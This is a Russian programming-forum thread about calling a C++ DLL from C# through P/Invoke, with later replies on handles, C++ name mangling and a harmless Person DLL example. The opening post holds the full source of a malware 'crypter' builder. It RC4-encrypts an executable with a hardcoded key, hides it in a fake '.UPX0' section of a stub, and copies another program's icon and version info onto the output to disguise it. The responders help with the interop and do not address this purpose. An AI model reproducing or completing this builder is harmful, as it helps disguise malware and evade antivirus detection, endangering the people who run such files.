Форум программистов, компьютерный форум, киберфорум
Наши страницы

С++ для начинающих

Войти
Регистрация
Восстановить пароль
 
 
hiphone
13 / 13 / 3
Регистрация: 28.01.2012
Сообщений: 549
#1

DLL компилируется, но не вызывается в приложении C# - C++

15.08.2014, 22:53. Просмотров 784. Ответов 27
Метки нет (Все метки)

Здравствуйте, есть DLL, компилируется без ошибок, но вызвать из C# её не получается, вот код:

C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
#define _CRT_SECURE_NO_WARNINGS
 
#include <Windows.h>
#include <io.h>
#include <fcntl.h>
#include <stdio.h>
#include <fstream>
 
#pragma region IconStruct
#pragma pack(push, 2)
__declspec(dllexport) typedef struct
    {
        WORD Reserved1;
        WORD ResourceType;
        WORD ImageCount;
        BYTE Width;
        BYTE Height;
        BYTE Colors;
        BYTE Reserved2;
        WORD Planes;
        WORD BitsPerPixel;
        DWORD ImageSize;
        WORD ResourceID;
    } GROUPICON;
#pragma pack(pop)
#pragma endregion IconStruct
 
    class __declspec(dllexport) Crypter {
    private:
        char InputFile[MAX_PATH];
        char IconFile[MAX_PATH];
        char VersionInput[MAX_PATH];
    public:
 
        void set_InputFilePath(char * c) {
            memcpy(InputFile, c, MAX_PATH);
        }
 
        void set_IconFilePath(char * c) {
            memcpy(IconFile, c, MAX_PATH);
        }
 
        void set_VersionInputPath(char * c) {
            memcpy(VersionInput, c, MAX_PATH);
        }
 
        DWORD CalcAlignedSize(DWORD size, DWORD alignment)
        {
            DWORD alignedSize;
            if (size % alignment == 0)
            {
                alignedSize = size;
            }
            else
            {
                alignedSize = size / alignment;
                ++alignedSize;
                alignedSize = alignedSize * alignment;
            }
 
            return alignedSize;
        }
 
        bool AddSection(LPSTR lpFileName, char * sectionName, LPBYTE lpSection, DWORD dwSectionSize, char * newName)
        {
            HANDLE hOriginalFile = CreateFile(lpFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
            if (hOriginalFile == INVALID_HANDLE_VALUE)
            {
                return false;
            }
 
            DWORD dwFileSize = GetFileSize(hOriginalFile, NULL);
            if (dwFileSize == INVALID_FILE_SIZE)
            {
                CloseHandle(hOriginalFile);
                return false;
            }
 
            LPBYTE lpBuffer = (LPBYTE)malloc(dwFileSize);
 
            DWORD dwNumberOfBytesRead = 0;
            ReadFile(hOriginalFile, lpBuffer, dwFileSize, &dwNumberOfBytesRead, NULL);
 
            PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)lpBuffer;
            if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
                return false;
 
            PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)(lpBuffer + pImageDosHeader->e_lfanew);
            if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
                return false;
 
            PIMAGE_SECTION_HEADER pImageSectionHeader = IMAGE_FIRST_SECTION(pImageNtHeaders);
 
            if (pImageNtHeaders->OptionalHeader.SizeOfHeaders - (pImageDosHeader->e_lfanew + sizeof(DWORD)+sizeof(IMAGE_FILE_HEADER)+pImageNtHeaders->FileHeader.SizeOfOptionalHeader + (pImageNtHeaders->FileHeader.NumberOfSections*sizeof(IMAGE_SECTION_HEADER))) < 0)
            {
                free(lpBuffer);
                CloseHandle(hOriginalFile);
                return false;
            }
 
            DWORD originalSizeOfImage = pImageNtHeaders->OptionalHeader.SizeOfImage;
 
            DWORD originalSizeOfHeaders = pImageNtHeaders->OptionalHeader.SizeOfHeaders;
 
            WORD originalNumberOfSections = pImageNtHeaders->FileHeader.NumberOfSections;
 
            DWORD pointerToLastSection = 0;
 
            DWORD sizeOfLastSection;
 
            DWORD virtualAddressOfLastSection;
 
            DWORD virtualSizeOfLastSection;
 
            for (int i = 0; i != pImageNtHeaders->FileHeader.NumberOfSections; ++i)
            {
                if (pointerToLastSection < pImageSectionHeader[i].PointerToRawData)
                {
                    pointerToLastSection = pImageSectionHeader[i].PointerToRawData;
                    sizeOfLastSection = pImageSectionHeader[i].SizeOfRawData;
                    virtualAddressOfLastSection = pImageSectionHeader[i].VirtualAddress;
                    virtualSizeOfLastSection = pImageSectionHeader[i].Misc.VirtualSize;
                }
            }
 
            IMAGE_SECTION_HEADER newImageSectionHeader;
 
            newImageSectionHeader.Misc.PhysicalAddress = dwSectionSize;
 
            newImageSectionHeader.Misc.VirtualSize = dwSectionSize;
 
            CopyMemory(&newImageSectionHeader.Name, (void*)sectionName, sizeof(newImageSectionHeader.Name));
 
            newImageSectionHeader.NumberOfLinenumbers = 0;
 
            newImageSectionHeader.NumberOfRelocations = 0;
 
            newImageSectionHeader.NumberOfLinenumbers = 0;
 
            newImageSectionHeader.NumberOfRelocations = 0;
 
            newImageSectionHeader.PointerToLinenumbers = 0;
 
            newImageSectionHeader.PointerToRawData = CalcAlignedSize(pointerToLastSection + sizeOfLastSection, pImageNtHeaders->OptionalHeader.FileAlignment);
 
            newImageSectionHeader.PointerToRelocations = 0;
 
            newImageSectionHeader.SizeOfRawData = CalcAlignedSize(dwSectionSize, pImageNtHeaders->OptionalHeader.FileAlignment);
 
            newImageSectionHeader.VirtualAddress = CalcAlignedSize(virtualAddressOfLastSection + virtualSizeOfLastSection, pImageNtHeaders->OptionalHeader.SectionAlignment);
 
            newImageSectionHeader.Characteristics = IMAGE_SCN_MEM_READ;
 
            ++pImageNtHeaders->FileHeader.NumberOfSections;
 
            pImageNtHeaders->OptionalHeader.SizeOfHeaders = CalcAlignedSize(pImageDosHeader->e_lfanew + sizeof(DWORD)+sizeof(IMAGE_FILE_HEADER)+pImageNtHeaders->FileHeader.SizeOfOptionalHeader + (pImageNtHeaders->FileHeader.NumberOfSections*sizeof(IMAGE_SECTION_HEADER)), pImageNtHeaders->OptionalHeader.FileAlignment);
 
            DWORD newSizeOfImage = pImageDosHeader->e_lfanew + sizeof(DWORD)+sizeof(IMAGE_FILE_HEADER)+pImageNtHeaders->FileHeader.SizeOfOptionalHeader + (pImageNtHeaders->FileHeader.NumberOfSections*sizeof(IMAGE_SECTION_HEADER));
 
            for (int i = 0; i != originalNumberOfSections; ++i)
            {
                newSizeOfImage += CalcAlignedSize(pImageSectionHeader[i].Misc.VirtualSize, pImageNtHeaders->OptionalHeader.SectionAlignment);
            }
 
            newSizeOfImage += CalcAlignedSize(newImageSectionHeader.Misc.VirtualSize, pImageNtHeaders->OptionalHeader.SectionAlignment);
 
            newSizeOfImage = CalcAlignedSize(newSizeOfImage, pImageNtHeaders->OptionalHeader.SectionAlignment);
 
            pImageNtHeaders->OptionalHeader.SizeOfImage = newSizeOfImage;
 
            pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
 
            pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
 
            HANDLE hUpdatedFile = CreateFile(newName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, NULL, NULL);
 
            if (hUpdatedFile == INVALID_HANDLE_VALUE)
            {
                free(lpBuffer);
                CloseHandle(hOriginalFile);
                return false;
            }
 
            DWORD dwNumberOfBytesWritten;
            WriteFile(hUpdatedFile, lpBuffer, originalSizeOfHeaders, &dwNumberOfBytesWritten, NULL);
 
            SetFilePointer(hUpdatedFile, pImageDosHeader->e_lfanew + sizeof(DWORD)+sizeof(IMAGE_FILE_HEADER)+pImageNtHeaders->FileHeader.SizeOfOptionalHeader + (originalNumberOfSections*sizeof(IMAGE_SECTION_HEADER)), NULL, FILE_BEGIN);
            WriteFile(hUpdatedFile, (LPVOID)&newImageSectionHeader, sizeof(IMAGE_SECTION_HEADER), &dwNumberOfBytesWritten, NULL);
 
            LPBYTE sectionsData = (LPBYTE)malloc(originalSizeOfImage - originalSizeOfHeaders);
 
            SetFilePointer(hOriginalFile, pImageNtHeaders->OptionalHeader.SizeOfHeaders, NULL, FILE_BEGIN);
            ReadFile(hOriginalFile, sectionsData, originalSizeOfImage - originalSizeOfHeaders, &dwNumberOfBytesRead, NULL);
 
            SetFilePointer(hUpdatedFile, pImageNtHeaders->OptionalHeader.SizeOfHeaders, NULL, FILE_BEGIN);
            WriteFile(hUpdatedFile, sectionsData, originalSizeOfImage - originalSizeOfHeaders, &dwNumberOfBytesWritten, NULL);
 
            free(sectionsData);
 
            SetFilePointer(hUpdatedFile, newImageSectionHeader.PointerToRawData, NULL, FILE_BEGIN);
            WriteFile(hUpdatedFile, lpSection, dwSectionSize, &dwNumberOfBytesWritten, NULL);
 
            CloseHandle(hUpdatedFile);
 
            free(lpBuffer);
 
            CloseHandle(hOriginalFile);
 
            return true;
        }
 
        void CopyVersionInfo(char * From, char * To)
        {
 
            HMODULE hFrom = NULL;
            HRSRC hRsrc = NULL;
            HANDLE hUpdateRes = NULL;
 
            hFrom = LoadLibraryEx(From, NULL, LOAD_LIBRARY_AS_DATAFILE);
 
            hUpdateRes = BeginUpdateResource(To, FALSE);
 
            for (DWORD i = 0; i < 1050; i++)
            {
 
                hRsrc = FindResource(hFrom, MAKEINTRESOURCE(i), RT_VERSION);
                if (hRsrc != NULL)
                {
                    if (!UpdateResource(hUpdateRes, RT_VERSION, MAKEINTRESOURCE(i), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), LockResource(LoadResource(hFrom, hRsrc)), SizeofResource(hFrom, hRsrc)))
                    {
                        break;
                    }
                }
 
            }
 
            EndUpdateResource(hUpdateRes, FALSE);
            FreeLibrary(hFrom);
 
        }
 
        VOID RC4(BYTE * bytes, DWORD sizeOfBytes, CHAR * key, DWORD sizeOfKey)
        {
            DWORD a = 0, b = 0;
            BYTE s[256], swap;
 
            for (int i = 0; i < 256; i++) s[i] = i;
            for (int i = 0; i < 256; i++)
            {
                b = (b + s[i] + key[i % sizeOfKey]) % 256;
                swap = s[a];
                s[a] = s[b];
                s[b] = swap;
            }
            for (DWORD i = 0; i < sizeOfBytes; i++)
            {
                a = (a + 1) % 256;
                b = (b + s[a]) % 256;
                swap = s[a];
                s[a] = s[b];
                s[b] = swap;
                bytes[i] ^= s[(s[a] + s[b]) % 256];
            }
 
        }
 
        void AddIcon(char * ExecutableFile, char * IconFile)
        {
            HANDLE hWhere = BeginUpdateResource(ExecutableFile, FALSE);
 
            char * buffer;
            long buffersize;
            int hFile;
 
            hFile = _open(IconFile, O_RDONLY | O_BINARY);
            if (hFile == EOF)
            {
                return;
            }
 
            buffersize = _filelength(hFile);
            buffer = (char*)malloc(buffersize);
            _read(hFile, buffer, buffersize);
            _close(hFile);
 
            UpdateResource(hWhere, RT_ICON, MAKEINTRESOURCE(1), MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT), (buffer + 22), buffersize - 22);
 
            GROUPICON grData;
 
            grData.Reserved1 = 0;
 
            grData.ResourceType = 1;
 
            grData.ImageCount = 1;
 
            grData.Width = 32;
 
            grData.Height = 32;
 
            grData.Colors = 0;
 
            grData.Reserved2 = 0;
 
            grData.Planes = 2;
 
            grData.BitsPerPixel = 32;
 
            grData.ImageSize = buffersize - 22;
 
            grData.ResourceID = 1;
 
            UpdateResource(hWhere, RT_GROUP_ICON, "MAINICON", MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT), &grData, sizeof(GROUPICON));
 
            delete buffer;
 
            EndUpdateResource(hWhere, FALSE);
 
        }
 
        void ReAlignPE(char * FilePath, DWORD AmounToAdd)
        {
            DWORD dwBytesRead = 0;
            HANDLE hFile = NULL;
            DWORD dwFileSize = 0;
            DWORD dwNumofSec = 0;
 
            hFile = CreateFileA(FilePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 
            dwFileSize = GetFileSize(hFile, NULL);
 
            BYTE *pByte = new BYTE[dwFileSize];
 
            ReadFile(hFile, pByte, dwFileSize, &dwBytesRead, NULL);
 
            CloseHandle(hFile);
 
            IMAGE_DOS_HEADER *pDosHeader = (IMAGE_DOS_HEADER *)pByte;
 
            IMAGE_NT_HEADERS *pNTHeaders = (IMAGE_NT_HEADERS *)(pDosHeader->e_lfanew + pByte);
 
            IMAGE_OPTIONAL_HEADER *pOptHeader = (IMAGE_OPTIONAL_HEADER*)(pByte + pDosHeader->e_lfanew + 4 + sizeof(IMAGE_FILE_HEADER));
 
            IMAGE_SECTION_HEADER *pSectionHeaders = (IMAGE_SECTION_HEADER*)((BYTE*)pOptHeader + sizeof(IMAGE_OPTIONAL_HEADER));
 
            pSectionHeaders[pNTHeaders->FileHeader.NumberOfSections - 1].SizeOfRawData = pSectionHeaders[pNTHeaders->FileHeader.NumberOfSections - 1].SizeOfRawData + AmounToAdd;
 
            CopyMemory(pByte + pDosHeader->e_lfanew + 4 + sizeof(IMAGE_FILE_HEADER)+sizeof(IMAGE_OPTIONAL_HEADER), pSectionHeaders, sizeof(IMAGE_SECTION_HEADER));
 
            hFile = CreateFileA(FilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
 
            WriteFile(hFile, pByte, dwFileSize, &dwBytesRead, NULL);
 
            CloseHandle(hFile);
 
        }
 
        bool fexists(const char * filename)
        {
            std::ifstream ifile(filename);
            return true;
        }
 
        void CryptFile(/*HWND hwnd*/)
        {
 
            if (fexists(InputFile) && fexists(VersionInput) && fexists(IconFile))
            {
                DWORD lpNumber = 0;
 
                HANDLE hFile = CreateFileA(InputFile, FILE_READ_ACCESS, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 
                DWORD FileSize = GetFileSize(hFile, NULL);
 
                LPVOID FileBytes = LocalAlloc(LMEM_FIXED, FileSize);
 
                ReadFile(hFile, FileBytes, FileSize, &lpNumber, NULL);
 
                CloseHandle(hFile);
 
                CHAR * rc4Key = "Ia3kkwRdIzPeq3OegK";
 
                DWORD rcKey_Length = lstrlen(rc4Key);
 
                RC4((BYTE*)FileBytes, FileSize, rc4Key, rcKey_Length);
 
                AddSection("Stub.exe", ".UPX0", (BYTE*)FileBytes, FileSize, "Done.exe");
 
                ReAlignPE("Done.exe", 0);
 
                CopyVersionInfo(VersionInput, "Done.exe");
 
                AddIcon("Done.exe", IconFile);
            }
            else
            {
                //MessageBoxA(hwnd, "Make sure all files exists!", "Error", MB_OK | MB_ICONEXCLAMATION);
            }
        }
    };
 
    __declspec(dllexport) Crypter* Crypter_Create() { return new Crypter(); }
    __declspec(dllexport) void Crypter_setIconFilePath(Crypter* pFoo, char * c) { pFoo->set_IconFilePath(c); }
    __declspec(dllexport) void Crypter_setInputFilePath(Crypter* pFoo, char * c) { pFoo->set_InputFilePath(c); }
    __declspec(dllexport) void Crypter_setVersionFilePath(Crypter* pFoo, char * c) { pFoo->set_VersionInputPath(c); }
    __declspec(dllexport) void Crypter_Crypt(Crypter* pFoo) { pFoo->CryptFile(); }
    __declspec(dllexport) void Crypter_Delete(Crypter* pFoo) { delete pFoo; }
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
15.08.2014, 22:53
Здравствуйте! Я подобрал для вас темы с ответами на вопрос DLL компилируется, но не вызывается в приложении C# (C++):

В приложении Dev C++ не компилируется код, что нужно изменить? - C++
#include &lt;iostream&gt; using namespace std; int main() { cout&lt;&lt;&quot;Avtor: Tsapenko K.V. &quot;; cout&lt;&lt;&quot;Lab1 SPZ\n&quot;; ...

Не компилируется 64-битная DLL из 32-битного проекта - C++
Добрый день! У меня есть проект MS VS2010 Prof+WinDDK7600, 32-битная DLL принтпроцессора. Во время печати спулер системы ее...

При создании класса конструктор вызывается 2 раза, затем вызывается деструктор о_О - C++
Вот такой кодclass A { public: A(){} virtual ~A(){} }; class C { public:

Указатели в VC++ (2010) DLL и в приложении C++Builder (RAD XE4) - C++
Здравствуйте! Есть такая ситуация: в приложении происходит вызов функции из библиотеки, в которую надо передать vector&lt;wchar_t*&gt;*. Когда...

Динамическое подключение VC++ (2012) DLL в приложении C++Builder (RAD XE5) - C++
Здравствуйте! Вроде бы подобные темы бывали, но я так и не смог понять, что не так, т.к. редко пишу на с++. Вот код в библиотеке VC++:...

Программа компилируется в Borland 6.0 но не компилируется в Visual Studio 2008 - C++
Ета програма компилируетса в борланде 6.0 но не компилируетса в Visualstudio 2008 и в борланде 10-м почему? #include&lt;iostream&gt; ...

27
DrOffset
7376 / 4453 / 1009
Регистрация: 30.01.2014
Сообщений: 7,304
16.08.2014, 15:56 #16
Цитата Сообщение от MrCold Посмотреть сообщение
DrOffset, я вас понял.
Именно об этом.
Только вот так (местами поменял):
Цитата Сообщение от MrCold Посмотреть сообщение
C#
1
2
3
IntPtr ptr = create(); 
doSome(ptr, 10);
destroy(ptr );
0
MrCold
855 / 753 / 71
Регистрация: 11.01.2012
Сообщений: 1,942
16.08.2014, 15:59 #17
Цитата Сообщение от DrOffset Посмотреть сообщение
Только вот так (местами поменял):
0
MrCold
855 / 753 / 71
Регистрация: 11.01.2012
Сообщений: 1,942
16.08.2014, 22:23 #18
да, конечно работать будет

Простенький класс Person
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#pragma once
#include <Windows.h> 
#include <sstream>
class Person
{
private:
    char internal_code[30];
    int age;
    char name[30];
 
public: 
    void set_internal_code(char * in_code);
    void set_age(int in_age);
    void set_name(char* in_name);
    void print_info();
 
};
 
 
extern "C++" 
{
    __declspec(dllexport) Person* PersonCreate();
 
    __declspec(dllexport) void PersonSetInternalCode(Person* pFoo, char * internal_code);
 
    __declspec(dllexport) void PersonSetAge(Person* pFoo, int age);
 
    __declspec(dllexport) void PersonSetName(Person* pFoo, char * name);
 
    __declspec(dllexport) void PersonPrintInfo(Person* pFoo);
 
    __declspec(dllexport) void PersonDelete(Person* pFoo);
}
Кликните здесь для просмотра всего текста
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#include "header.h"
 
 
void Person::set_internal_code(char * in_code)
{
    strcpy(internal_code, in_code);
}
 
void Person::set_age(int in_age)
{
    age = in_age;
}
 
void Person::set_name(char* in_name)
{
    strcpy(name, in_name);
}
 
void Person::print_info()
{
    std::ostringstream os;
    os << "internal_code : " << internal_code 
       <<  "\nage :        " << age 
       <<  "\nname :       " << name;
    MessageBoxA(NULL,os.str().c_str(),"",NULL);
    
}
 
 
 
 
extern "C++" 
{
    __declspec(dllexport) Person* PersonCreate()
    { 
        return new Person();
    }
 
    __declspec(dllexport) void PersonSetInternalCode(Person* pFoo, char * internal_code)
    { 
        pFoo->set_internal_code(internal_code);
    }
 
    __declspec(dllexport) void PersonSetAge(Person* pFoo, int age)
    { 
        pFoo->set_age(age);
    }
 
    __declspec(dllexport) void PersonSetName(Person* pFoo, char * name)
    {
        pFoo->set_name(name);
    }
 
    __declspec(dllexport) void PersonPrintInfo(Person* pFoo)
    { 
        pFoo->print_info();
    }
 
    __declspec(dllexport) void PersonDelete(Person* pFoo)
    { 
        delete pFoo;
    }
}


Используем на С# .
получили MEssageBox с инфой о персоне
Кликните здесь для просмотра всего текста
C#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
using System;
using System.Runtime.InteropServices;
 
    class Program
    {
        [DllImport("NativeDll.dll",
            CallingConvention = CallingConvention.Cdecl,
            EntryPoint = "?PersonCreate@@YAPAVPerson@@XZ")]
        static extern IntPtr PersonCreate();
 
        [DllImport("NativeDll.dll",
            CallingConvention = CallingConvention.Cdecl,
            EntryPoint = "?PersonSetInternalCode@@YAXPAVPerson@@PAD@Z")]
        static extern void PersonSetInternalCode(IntPtr pFoo, string internal_code);
 
        [DllImport("NativeDll.dll", 
            CallingConvention = CallingConvention.Cdecl,
            EntryPoint = "?PersonSetAge@@YAXPAVPerson@@H@Z")]
        static extern void PersonSetAge(IntPtr pFoo, int age);
 
        [DllImport("NativeDll.dll",
            CallingConvention = CallingConvention.Cdecl,
            EntryPoint = "?PersonSetName@@YAXPAVPerson@@PAD@Z")]
        static extern void PersonSetName(IntPtr pFoo, string name);
 
        [DllImport("NativeDll.dll",
            CallingConvention = CallingConvention.Cdecl,
            EntryPoint = "?PersonPrintInfo@@YAXPAVPerson@@@Z")]
        static extern void PersonPrintInfo(IntPtr pFoo);
 
        [DllImport("NativeDll.dll",
            CallingConvention = CallingConvention.Cdecl,
            EntryPoint = "?PersonDelete@@YAXPAVPerson@@@Z")]
        static extern void PersonDelete(IntPtr pFoo);
 
        static void Main(string[] args)
        {
            IntPtr person = PersonCreate();
            PersonSetInternalCode(person, "0987345");
            PersonSetAge(person, 30);
            PersonSetName(person, "Migel");
            PersonPrintInfo(person);
            PersonDelete(person);
 
            Console.ReadKey();
        }
}


И все же, останусь при своем мнении. ШАРП не тот язык чтобы работать с адресами,
Хотя нам не мешает сборщик мусора, так адреса получаем из нативных функций,
но я бы приложил усилия что бы пользователь моей библиотеки не имел доступа к указателям.
От класса Crypter у Т.С. избавился бы , методы заменив функциями
Или вообще на ШАРП все переписал бы, как уже говорил.
1
Миниатюры
DLL компилируется, но не вызывается в приложении C#  
DrOffset
7376 / 4453 / 1009
Регистрация: 30.01.2014
Сообщений: 7,304
16.08.2014, 22:44 #19
Цитата Сообщение от MrCold Посмотреть сообщение
И все же, останусь при своем мнении. ШАРП не тот язык чтобы работать с адресами
Дык это, условно говоря, не адрес, а дескриптор. Как HANDLE в WinAPI. По большому счету вызывающей стороне должно быть все равно, адрес это или целое число или еще что. Если кто-то решит воспользоваться WinAPI из C#, то его ждут все те же дескрипторы, от этого никуда не деться.

Цитата Сообщение от MrCold Посмотреть сообщение
От класса Crypter у Т.С. избавился бы , методы заменив функциями
У ТС вообще зря экспортируется сам класс. Нужно было только продекларировать тип предварительным объявлением, а все методы у него и так завернуты в функции.
А если избавляться от класса так, как в том посте, с глобальным пойнтером, то это очень-очень плохо. Поверь мне, я 8 лет пишу разнообразные общесистемные библиотеки.

Цитата Сообщение от MrCold Посмотреть сообщение
Или вообще на ШАРП все переписал бы, как уже говорил.
А вот с этим согласен. Ни к чему этот геморрой с переносимостью, когда задачу возможно решить на основном языке.

MrCold, объясню почему я так резко против интерфейсов без дескрипторов. У нас в организации своя система. С очень большой историей. Общесистемных библиотек и API было написано много. Так вот, некоторые важные компоненты были именно так построены, с инициализацией глобального указателя внутри. Из-за этого было невозможно ни обеспечить реентерабельность, ни воспользоваться несколькими инстансами одновременно, и самое печальное, что в одном из компонентов кто-то использовал выгрузку инстанса из синглтона, а т.к. порядок уничтожения глобальных объектов в разных модулях не определен, в один прекрасный момент все стало крэшится из-за попытки обращения к уничтоженному указателю, т.к. библиотека умудрялась выгружаться раньше, чем другой модуль с синглтоном. Для промышленного применения этот способ сродни исключению из деструктора - bad practice, так сказать.
Тоже самое могу сказать про интерфейс с коллбэками без возможности сохранения контекста. Если интерфейс позволяет регистрировать коллбэк, но не позволяет забиндить для передачи в него userdata, то это плохой, негодный интерфейс.
1
MrCold
855 / 753 / 71
Регистрация: 11.01.2012
Сообщений: 1,942
16.08.2014, 22:53 #20
Цитата Сообщение от DrOffset Посмотреть сообщение
А если избавляться от класса так, как в том посте, с глобальным пойнтером, то это очень-очень плохо. Поверь мне, я 8 лет пишу разнообразные общесистемные библиотеки.
А тут согласен был с самого начала . Просто что первое придумал написал , примерную схему. глобальный поинтер там не удачно привел, это да . знал что кто нибудь поправит.
0
John Prick
805 / 738 / 146
Регистрация: 27.07.2012
Сообщений: 2,110
Завершенные тесты: 3
17.08.2014, 23:51 #21
C#
1
2
3
4
        [DllImport("NativeDll.dll",
            CallingConvention = CallingConvention.Cdecl,
            EntryPoint = "?PersonCreate@@YAPAVPerson@@XZ")]
        static extern IntPtr PersonCreate();
Я так понимаю, вот это название функции "?PersonCreate@@YAPAVPerson@@XZ" зависит от компилятора, которым собиралась библиотека?
0
MrCold
855 / 753 / 71
Регистрация: 11.01.2012
Сообщений: 1,942
18.08.2014, 01:17 #22
Цитата Сообщение от John Prick Посмотреть сообщение
Я так понимаю, вот это название функции "?PersonCreate@@YAPAVPerson@@XZ" зависит от компилятора, которым собиралась библиотека?
Да, VS так искажает. Правила декорации можно на MSDN смотреть или wikipedia name_mangling
Как остальные компиляторы искажают, и искажают ли, не знаю.
1
DrOffset
7376 / 4453 / 1009
Регистрация: 30.01.2014
Сообщений: 7,304
18.08.2014, 07:33 #23
Цитата Сообщение от MrCold Посмотреть сообщение
Как остальные компиляторы искажают, и искажают ли, не знаю.
Есть более общая статья.
А вообще - это не искажение, без этого нельзя было бы "бесплатно" поддерживать тот список фич, которые есть в с++ (перегрузка, пространства имен, спецификация исключений, константность методов и т.д.).
2
John Prick
805 / 738 / 146
Регистрация: 27.07.2012
Сообщений: 2,110
Завершенные тесты: 3
18.08.2014, 10:01 #24
Т.е. вышеуказанный способ подключения dll из C# работает только если знать каким компилятором собиралась библиотека и как этот компилятор расширяет (верный же термин?) имена функций?
0
MrCold
855 / 753 / 71
Регистрация: 11.01.2012
Сообщений: 1,942
18.08.2014, 10:45 #25
John Prick,а в чем проблема ? "Искаженные" имена просмотреть не трудно,
с помощью dumbin или Dependency Walker .
1
DrOffset
7376 / 4453 / 1009
Регистрация: 30.01.2014
Сообщений: 7,304
18.08.2014, 11:21 #26
Цитата Сообщение от John Prick Посмотреть сообщение
расширяет (верный же термин?)
Верный термин - декорирует.
А вообще да, единого ABI для C++ нет по сей день. Поэтому нормальные библиотеки, рассчитанные на переносимость, должны экспортировать так же и plain C интерфейс.
0
John Prick
805 / 738 / 146
Регистрация: 27.07.2012
Сообщений: 2,110
Завершенные тесты: 3
18.08.2014, 11:21 #27
MrCold, а если dll будет перекомпилирована позднее? Расширенные имена ведь могут измениться, хотя краткие имена останустся теми же. Переписывать приложение каждый раз после перекомпиляции dll, наверное, не лучший вариант.
0
DrOffset
7376 / 4453 / 1009
Регистрация: 30.01.2014
Сообщений: 7,304
18.08.2014, 11:28 #28
Цитата Сообщение от John Prick Посмотреть сообщение
а если dll будет перекомпилирована позднее?
Если программист, который пишет dll, не приложил усилия, чтобы их изменить, то они не изменятся.
Эти имена по определенным законам строятся, а не случайно.
1
18.08.2014, 11:28
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
18.08.2014, 11:28
Привет! Вот еще темы с ответами:

Не вызывается справка в приложении после выполнения операции - C#
Ситуация такая. Имеется приложение, в нем с помощью нажатия на кнопку вызывается справка в формате *.pdf. При первом запуске приложения, до...

Dll вызывается, но при выделении памяти вылетает - C++ WinAPI
Доброго времени суток. Столкнулся с проблемой выделением памяти в dll. Вызываю функцию: char * word = &quot;ABCDEF&quot;; HINSTANCE...

Копируется ли DLL, если вызывается много раз одновременно - Visual Basic .NET
Я пишу DLL, в которую вынесена простая функция, но для её расчёта нужен большой массив коэффициентов. Что происходит, когда функция...

Не компилируется dll - Delphi
Сам длл: library Project2; uses ShareMem, Windows, Dialogs,


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
28
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Рейтинг@Mail.ru